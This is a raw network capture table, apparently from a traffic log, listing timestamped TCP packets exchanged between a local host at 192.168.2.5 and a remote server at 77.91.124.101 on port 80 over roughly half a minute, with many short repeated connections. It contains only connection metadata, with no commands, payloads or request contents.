                                                            Nov 21, 2023 04:48:23.244353056 CET4979980192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:23.308058023 CET804980077.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:23.308073997 CET804980077.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:23.312886953 CET804980077.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:23.353749037 CET4980080192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:23.428406000 CET4979980192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:23.428437948 CET4980080192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:23.429019928 CET4980180192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:23.625499010 CET804980177.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:23.625679016 CET4980180192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:23.625977993 CET804979977.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:23.625998974 CET4980180192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:23.626032114 CET4979980192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:23.627301931 CET804980077.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:23.627367020 CET4980080192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:23.822444916 CET804980177.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:23.822474003 CET804980177.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:23.822760105 CET4980180192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:24.019813061 CET804980177.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:24.019831896 CET804980177.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:24.026417971 CET804980177.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:24.072474003 CET4980180192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:24.149220943 CET4980280192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:24.347518921 CET804980277.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:24.347619057 CET4980280192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:24.347886086 CET4980280192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:24.546741962 CET804980277.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:24.546761036 CET804980277.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:24.546966076 CET4980280192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:24.744587898 CET804980277.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:24.744601965 CET804980277.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:24.749294043 CET804980277.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:24.791263103 CET4980280192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:24.866031885 CET4980280192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:24.866437912 CET4980380192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:25.067226887 CET804980377.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:25.067285061 CET804980277.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:25.067464113 CET4980280192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:25.067468882 CET4980380192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:25.067761898 CET4980380192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:25.277518988 CET804980377.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:25.277538061 CET804980377.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:25.277765989 CET4980380192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:25.474365950 CET804980377.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:25.474406958 CET804980377.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:25.479048967 CET804980377.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:25.525733948 CET4980380192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:25.600869894 CET4980380192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:25.601320028 CET4980480192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:25.797530890 CET804980377.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:25.797616959 CET4980380192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:25.799912930 CET804980477.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:25.800035000 CET4980480192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:25.800508976 CET4980480192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:25.999152899 CET804980477.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:25.999167919 CET804980477.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:25.999428034 CET4980480192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:26.198118925 CET804980477.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:26.209800005 CET804980477.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:26.259999037 CET4980480192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:26.340667963 CET4980480192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:26.341114998 CET4980580192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:26.539402962 CET804980577.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:26.539577007 CET4980580192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:26.539843082 CET4980580192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:26.540630102 CET804980477.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:26.540692091 CET4980480192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:26.737046003 CET804980577.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:26.737345934 CET804980577.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:26.738204956 CET4980580192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:26.934540987 CET804980577.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:26.934734106 CET804980577.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:26.941642046 CET804980577.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:26.994523048 CET4980580192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:27.067461014 CET4980180192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:27.069034100 CET4980580192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:27.069621086 CET4980680192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:27.265774965 CET804980577.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:27.265877008 CET4980580192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:27.268551111 CET804980677.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:27.268646955 CET4980680192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:27.268814087 CET4980680192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:27.467658043 CET804980677.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:27.467691898 CET804980677.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:27.467921019 CET4980680192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:27.668662071 CET804980677.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:27.673158884 CET804980677.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:27.728789091 CET4980680192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:27.791090965 CET4980680192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:27.791416883 CET4980780192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:27.987968922 CET804980777.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:27.988145113 CET4980780192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:27.988404036 CET4980780192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:27.990009069 CET804980677.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:27.990087032 CET4980680192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:28.184833050 CET804980777.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:28.185064077 CET804980777.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:28.185298920 CET4980780192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:28.198307991 CET4980780192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:28.198645115 CET4980880192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:28.320805073 CET4980980192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:28.381860971 CET804980777.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:28.381875992 CET804980777.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:28.386883974 CET804980777.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:28.386940002 CET4980780192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:28.394717932 CET804980777.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:28.394768000 CET4980780192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:28.395483017 CET804980877.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:28.395555019 CET4980880192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:28.395704985 CET4980880192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:28.519516945 CET804980977.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:28.519596100 CET4980980192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:28.519782066 CET4980980192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:28.592457056 CET804980877.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:28.592679977 CET804980877.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:28.592916012 CET4980880192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:28.718632936 CET804980977.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:28.718663931 CET804980977.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:28.718990088 CET4980980192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:28.789834976 CET804980877.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:28.794825077 CET804980877.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:28.838129997 CET4980880192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:28.917680025 CET804980977.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:28.917696953 CET804980977.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:28.922313929 CET804980977.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:28.963129044 CET4980980192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:29.038387060 CET4980880192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:29.038536072 CET4980980192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:29.038937092 CET4981080192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:29.235243082 CET804980877.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:29.235399008 CET4980880192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:29.236490011 CET804981077.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:29.236583948 CET4981080192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:29.236812115 CET4981080192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:29.237035036 CET804980977.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:29.237090111 CET4980980192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:29.434448957 CET804981077.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:29.434954882 CET804981077.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:29.435201883 CET4981080192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:29.632966995 CET804981077.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:29.632982016 CET804981077.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:29.637830973 CET804981077.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:29.681958914 CET4981080192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:29.758577108 CET4981180192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:29.957474947 CET804981177.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:29.957566023 CET4981180192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:29.957750082 CET4981180192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:30.160239935 CET804981177.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:30.160639048 CET804981177.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:30.160854101 CET4981180192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:30.365766048 CET804981177.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:30.369224072 CET804981177.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:30.416368008 CET4981180192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:30.492539883 CET4981180192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:30.493103981 CET4981280192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:30.689537048 CET804981277.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:30.689660072 CET4981280192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:30.689914942 CET4981280192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:30.691181898 CET804981177.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:30.691279888 CET4981180192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:30.886113882 CET804981277.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:30.886128902 CET804981277.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:30.886403084 CET4981280192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:31.082734108 CET804981277.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:31.082748890 CET804981277.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:31.087574005 CET804981277.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:31.135288954 CET4981280192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:31.209783077 CET4981280192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:31.210203886 CET4981380192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:31.405956984 CET804981277.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:31.406043053 CET4981280192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:31.408806086 CET804981377.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:31.408900976 CET4981380192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:31.409105062 CET4981380192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:31.607850075 CET804981377.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:31.608257055 CET804981377.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:31.608489990 CET4981380192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:31.807269096 CET804981377.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:45.864135027 CET804983477.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:45.868627071 CET804983477.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:45.916309118 CET4983480192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:45.993278980 CET4983380192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:45.993309021 CET4983480192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:45.993840933 CET4983580192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:46.190121889 CET804983477.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:46.190247059 CET4983480192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:46.191040993 CET804983377.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:46.191102982 CET4983380192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:46.192542076 CET804983577.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:46.192651987 CET4983580192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:46.192867041 CET4983580192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:46.391829967 CET804983577.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:46.391906977 CET804983577.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:46.392203093 CET4983580192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:46.591191053 CET804983577.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:46.591234922 CET804983577.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:46.595650911 CET804983577.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:46.650691986 CET4983580192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:46.710149050 CET4983680192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:46.907819986 CET804983677.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:46.907927036 CET4983680192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:46.908144951 CET4983680192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:47.105751038 CET804983677.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:47.105767965 CET804983677.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:47.105983019 CET4983680192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:47.303853989 CET804983677.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:47.303869963 CET804983677.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:47.308711052 CET804983677.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:47.353904009 CET4983680192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:47.428858995 CET4983680192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:47.429299116 CET4983780192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:47.627346992 CET804983677.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:47.627504110 CET4983680192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:47.628783941 CET804983777.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:47.628895998 CET4983780192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:47.629125118 CET4983780192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:47.828666925 CET804983777.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:47.828713894 CET804983777.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:47.828972101 CET4983780192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:48.028744936 CET804983777.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:48.028794050 CET804983777.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:48.033458948 CET804983777.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:48.088208914 CET4983780192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:48.149730921 CET4983780192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:48.150338888 CET4983880192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:48.348126888 CET804983877.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:48.348203897 CET4983880192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:48.348392010 CET4983880192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:48.351250887 CET804983777.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:48.351372957 CET4983780192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:48.545351028 CET804983877.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:48.545490980 CET804983877.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:48.545708895 CET4983880192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:48.742820978 CET804983877.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:48.742914915 CET804983877.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:48.747749090 CET804983877.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:48.791343927 CET4983880192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:48.867209911 CET4983880192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:48.867625952 CET4983980192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:49.064276934 CET804983877.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:49.064343929 CET4983880192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:49.065114975 CET804983977.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:49.065200090 CET4983980192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:49.065499067 CET4983980192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:49.267179966 CET804983977.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:49.267235994 CET804983977.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:49.267549038 CET4983980192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:49.465248108 CET804983977.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:49.465261936 CET804983977.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:49.470273018 CET804983977.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:49.525739908 CET4983980192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:49.859536886 CET4983980192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:49.860080004 CET4984080192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:50.060401917 CET804983977.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:50.060468912 CET4983980192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:50.064697981 CET804984077.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:50.064770937 CET4984080192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:50.064968109 CET4984080192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:50.263155937 CET804984077.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:50.263237000 CET804984077.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:50.307013035 CET4984080192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:51.500138998 CET4984080192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:51.501117945 CET4984180192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:51.501719952 CET4984080192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:51.600766897 CET804983577.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:51.600842953 CET4983580192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:51.632555962 CET4984280192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:51.697412014 CET804984177.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:51.697598934 CET804984077.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:51.697638035 CET4984180192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:51.697676897 CET804984077.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:51.698138952 CET4984180192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:51.702452898 CET804984077.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:51.702497005 CET804984077.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:51.702558041 CET4984080192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:51.702594995 CET4984080192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:51.831227064 CET804984277.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:51.831480980 CET4984280192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:51.831931114 CET4984280192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:51.894608021 CET804984177.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:51.894644976 CET804984177.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:51.895076990 CET4984180192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:52.030450106 CET804984277.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:52.030527115 CET804984277.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:52.031117916 CET4984280192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:52.091532946 CET804984177.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:52.096456051 CET804984177.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:52.150779963 CET4984180192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:52.229856014 CET804984277.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:52.234703064 CET804984277.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:52.275757074 CET4984280192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:52.351830006 CET4984180192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:52.351938963 CET4984280192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:52.352638960 CET4984380192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:52.552184105 CET804984177.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:52.552319050 CET4984180192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:52.554239988 CET804984277.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:52.554258108 CET804984377.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:52.554312944 CET4984280192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:52.554354906 CET4984380192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:52.554563046 CET4984380192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:52.759437084 CET804984377.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:52.759457111 CET804984377.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:52.759687901 CET4984380192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:52.958286047 CET804984377.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:52.958298922 CET804984377.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:52.963704109 CET804984377.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:53.010123014 CET4984380192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:53.091126919 CET4984380192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:53.091686010 CET4984480192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:53.289022923 CET804984377.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:53.289047956 CET804984477.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:53.289125919 CET4984380192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:53.289166927 CET4984480192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:53.289393902 CET4984480192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:53.486849070 CET804984477.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:53.486891031 CET804984477.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:53.487193108 CET4984480192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:53.684886932 CET804984477.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:53.684906960 CET804984477.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:53.689637899 CET804984477.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:53.744477987 CET4984480192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:53.804989100 CET4984580192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:54.001570940 CET804984577.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:54.001748085 CET4984580192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:54.002024889 CET4984580192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:54.198425055 CET804984577.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:54.198462009 CET804984577.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:54.198731899 CET4984580192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:54.395390987 CET804984577.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:54.395432949 CET804984577.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:54.400331020 CET804984577.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:54.447626114 CET4984580192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:54.531034946 CET4984580192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:54.531656027 CET4984680192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:54.731539011 CET804984577.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:54.731690884 CET4984580192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:54.733141899 CET804984677.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:54.733237982 CET4984680192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:54.733474016 CET4984680192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:54.930892944 CET804984677.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:54.930938959 CET804984677.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:54.931238890 CET4984680192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:55.128897905 CET804984677.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:55.128915071 CET804984677.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:55.134145021 CET804984677.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:55.181966066 CET4984680192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:55.255959988 CET4984680192.168.2.577.91.124.101
